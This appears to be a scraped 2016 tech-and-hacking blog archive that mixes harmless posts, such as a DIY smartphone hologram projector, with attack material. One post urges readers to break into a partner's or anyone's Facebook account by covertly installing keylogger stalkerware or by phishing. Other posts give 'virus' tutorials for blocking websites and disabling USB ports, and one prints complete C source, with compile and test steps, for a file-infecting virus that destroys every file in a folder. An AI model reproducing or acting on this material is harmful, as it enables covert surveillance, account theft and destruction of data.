Facebook apps on Android are known to make the phone slow and sluggish. In one of the recent experiments conducted by The Guardian, it was proved that Facebook apps
Wednesday, 15 June 2016
Facebook apps on Android are known to make the phone slow and sluggish. In one of the recent experiments conducted by The Guardian, it was proved that Facebook apps
Thursday, 9 June 2016
We are living in a time when a lot of our conversations take place through messaging apps on our smartphones. While most of us use the popular messaging apps like WhatsApp, Hike, Viber, Facebook Messenger, etc.
Texting friends on WhatsApp,clicking salfies with the camera, jotting down notes or preparing for a board presentation. We do so much with our Android smartphones and thus, it’s important to keep track of things you might be doing wrong on your device.
Wednesday, 1 June 2016
Tuesday, 31 May 2016
There’s a very popular theory that says ‘there are 7 people around the world who look alike’, which means each of us have a twin somewhere across the world. Maybe it’s true or maybe it’s not , no one knows about that but we all have that curiosity to know about our doppelgänger or twin.
Monday, 30 May 2016
Whether it’s photos taken to commemorate special events, or random selfies shared on social networks, or anything else, Digital images are probably (one of) the most common type of files that we work with on a regular basis.
Saturday, 28 May 2016
Wednesday, 18 May 2016
Saturday, 14 May 2016
Friday, 6 May 2016
Monday, 2 May 2016
Wednesday, 27 April 2016
Saturday, 23 April 2016
1. Create Undelete-able Folders
You can create undeletable folders using specific set of keywords. In the Command Prompt, type the name of the drive where you want to create the folder (it must not have Windows installed in it).
Friday, 22 April 2016
Tuesday, 19 April 2016
Friday, 15 April 2016
Wednesday, 13 April 2016
Monday, 11 April 2016
Saturday, 9 April 2016
Need to Hack Someone’s Facebook Password?
Here’s a Complete Guide on Possible Ways to Hack Facebook!
Here’s a Complete Guide on Possible Ways to Hack Facebook!
In the recent years, Facebook has also become a popular place for many to exchange secret messages and manage illicit relationships. Therefore, it’s no wonder many people make up their minds to hack Facebook password of their loved ones. May be you’re in a similar situation or just want to hack the password of any Facebook account, this article will surely help you out.
Recently, a lot of fake websites have popped-up on the Internet making false promises to hack the Facebook password of any account. These sites often demand people to take-up a surveys in order to reveal the password of the hacked Facebook account. This is only a trick to make quick money by forcing people to take up surveys. However, upon completing of the survey no Facebook password is given to the people. So, I always warn my visitors about such scam websites and their fake promises about hacking Facebook.
Possible Ways to Hack a Facebook Password:
With over 2 years of experience, I can tell you is that there are only TWO ways to hack a Facebook password.:
1. Using a Keylogger – Easiest Way to Hack Facebook!
A keylogger when installed will simply record each and every keystroke that a user types on a specific computer’s keyboard including Facebook or any other account password.
Since keylogger requires no special skills to install and use, it is the easiest way to hack a Facebook password. I recommend the following keylogger program asthe best one to gain access to Facebook or any other online account:
To Hack Facebook Users on PC/Mac:
Why Realtime-Spy is the Best?
Realtime-Spy Top Features:
- Remote Installation from any corner of the globe.
- 100% stealth operation and remains undetected!
- Extremely easy to use as it requires no special skills to install.
- Compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
How it Works?
To hack the Facebook password, all you need to do is just install Realtime-Spy on the target computer. When the target user logs into his Facebook account from this computer, the login details (username and password) are captured and uploaded instantly to the Realtime-Spy servers. You can later access the stored logs to obtain the Facebook password.
Download Realtime-Spy – for Windows
Download Realtime-Spy – for Mac
To Hack Facebook Users on Mobile:
To hack the Facebook password of mobile users, there is a mobile version of this program called “mSpy”.
Download mSpy – for Mobile Devices
Supported Phones: Android, iPhone, iPad and Tablets.
2. Phishing – The Difficult Way:
The other common way to hack Facebook account is via Phishing. This method will make use of a fake login page (spoofed web page) which will exactly resemble the original one. A spoofed web page of Facebook looks exactly same as that of the original Facebook website. This page is actually created by the hacker and is hosted on his own server. Once the victim enters his/her Facebook password on such a fake login page, the login details are stolen away by the hacker.
Phishing requires specialized knowledge and high level skills to implement. Therefore, it would not be possible for a newbie user (perhaps like you) to attempt this trick. It is a punishable offense too. So in order to successfully hack the Facebook password, I recommend the usage of keylogger as it is the easiest and the safest way.
Why do People Want to Hack Facebook Passwords?
You many wonder why people want to hack the password of someone’s Facebook account. In most cases people attempt to hack the Facebook account of their boyfriend or girlfriend so as to find out what is going on behind the scenes. These days parents are also concerned about their child’s Facebook activity and would like to hack their Facebook accounts to monitor. A husband or wife may try to hack the password and gain access to a suspicious partner’s Facebook account and so on. While most people have a strong motive behind their need to hack passwords, there are a few who also hack Facebook password just to exhibit their skills.
Facebook Hacking Methods that Do Not Work:
- There is no ready-made software program that is available to hack Facebook password (except the keylogger). In fact, keyloggers are pretty generic and are designed to log the keystrokes of a specific computer which in turn can be used to hack Facebook passwords.
- It is no longer possible to use conventional methods like brute-force approach to hack Facebook password. This is because big time players like Facebook have employed tight security measures to protect themselves against any such password hacking attempts. Since Facebook has millions of users, they take every possible security measure to safeguard their accounts which otherwise could cause a severe impact on their business. So, if you come across any website teaching such age old tricks, please be assured that they cannot be successful against Facebook.
Common Myths About Hacking Facebook Password
Unlike what many scam websites claim, Facebook website or Facebook servers do not contain any flaw that allows hackers to crack its password. The only Facebook hacking method that can give you the password is keylogging and phishing. None of the other methods is known to obtain the password for you!
! DISCLAIMER: YOU IMPLEMENT ALL THE INFORMATION PROVIDED IN THIS ARTICLE AT YOUR OWN RISK. USAGE OF SPYWARE WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!
THE END
Friday, 8 April 2016
Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done.
As usual I am using my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block.
I have just removed the source code of this program from this post as it is lengthy and makes the post look messy. You can still download the source code of this virus program from the following link:
How Virus Program Works?
The Windows operating system maintains a special file called HOSTS which can be used to block any given hostname or domain name (website) by adding new entries onto it. This program works by modifying the HOSTS file by adding new entries of those sites that are intended to be blocked. The HOSTS file is located at:
%windir%\system32\drivers\etc (Usually: C:\windows\system32\drivers\etc)
So, when you execute this program, all it does is add the entries of the list of those sites (mentioned in the source code) to this HOSTS file. Once this is done, the site will be blocked from your computer. So, none of the browsers would be able to load those sites on your computer.
Now, as far as the technical part of this program is concerned, people who have a working knowledge of ‘C’ should be easily able to understand the working of this virus program. However, for those who are new to ‘C’ programming, here is the algorithm of this program:
- Determine the Root drive. ie: Find the drive (C:, D:, E: or F:) on which the Windows is installed.
- Navigate to: %windir% -> system32 -> drivers -> etc
- Open/Load the HOSTS file.
- Copy a list of those websites that are mentioned in the ARRAY to the END of the file.
- Save the file and Exit.
How to Compile the Source Code?
For a step-by-step compilation guide, refer my post: How to compile C Programs?
Testing the Virus:
- To test, run the compiled module. It will block the sites that are listed in the source code.
- Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
- To remove the virus type the following command in the Run.
%windir%\system32\drivers\etc
- There, open the file named “hosts” using the notepad. At the bottom of the opened file you’ll see something like this:
127.0.0.1 google.com
- Delete all such entries which contain the names of blocked sites.
THE END
Wednesday, 6 April 2016
In this post, I will show how to create a simple virus that disables the USB portson the computer (PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
Download the source code of the virus program on to your computer from the following link:
- The download contains the following 2 files:
- block_usb.c (source code)
- unblock_usb.c (source code)
- You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my page – How to Compile C Programs.3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
- To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
How it Works?
The idea behind the working of this virus is pretty straightforward. It works by gaining access to the Windows registry and modifying its settings to disable the USB device support on the computer.
On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.
THE END
This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],"rb");
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.
You can download the source code from the following link:
How the Virus Program Works?
The algorithm of this virus program is as follows:Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).Step-2: Load the copy of the virus itself onto the memory.Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.How to Compile the Program:
For a step-by-step guide, you can refer my detailed page on- how to compile C programs?How to Test the Virus After the Compilation:
Create a new empty folder. Put some executable files (or any other files) in the folder. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.THE END
Saturday, 2 April 2016
Live 3D Holograms are the things of the future. We all have seen people using 3D Holograms in Movies, but have you ever wished to see on for real in front of you. Well, now you can.
In this IBUVIRUS I will teach how to make Mod your smartphone to make a 3D projector out of it by keeping just a little device on the samrtphone screen, which can be made of materials available at home.
You can view this 3D Hologram without the help of any glass, all you need is a smartphone and the small device, which I will teach you to make.
Step 1:- Materials Required
->CD case
->Marker
->Pen
->Pencil
->Pair Of Scissors
->Sellotape and/or Superglue
->Craft Knife or Glass Cutter
->A Smartphone
Step 2:-Extracting The Blank Plastic Side From CD Case
STEPS (Refer to images for further help):
- Take out the Paper Cover from the CD Case
- Cut the Plastic Cover on top of the CD Case
- Cut the CD Case from between to get the blank side of the cover, i.e. the side opposite to the side where we keep CDs.
- Now you have successfully retrieved a thick plastic sheet from an old CD Case
Step 3:-Tracing The Trapezium
Step 4:-Cutting The Trapezium From The Plastic CD Case
Using the graph paper cut-out we got from the last step, trace the trapezium on to the Cd Case using the Marker. Refer images to get a more clear idea of what you're reading. Repeat this step 4 times
Using the Craft knife or Glass Cutter cut through the Marker lines and as a result you will get 4 trapeziums.
With the completion of this step you have completed 90% of the work.
Step 5: Making A Plateau prism
Imagine a prism (Pyramid) with the top chopped of, what you get is a plateau prism. We are trying to create something exactly like that.
STEPS:
- Tape these 4 trapeziums together and, what you get would be exactly what we need. But, if on taping what you get is nothing like a prism but just a flat shape, it means that you did not cut the shape(s) correctly in the last step and made some mistakes which led to formation of trapezium with wrong dimensions, recheck your measurements.
- Apply glue/superglue, where the non-parallel sides meet (Place where you applied tape) and let it dry.
- If you are happy with what you get, you may remove the tape. [I did not, as it makes no difference]
Step 6: Making the Projector Work
STEPS:
- Just place the prism upside down (Broad side on top) on the centre of the screen at the point where you see 2 white lines intersect at the start of any video. (Refer to image for more clarity).
- Play the video and watch he magnificent 3D Image formed.
THE END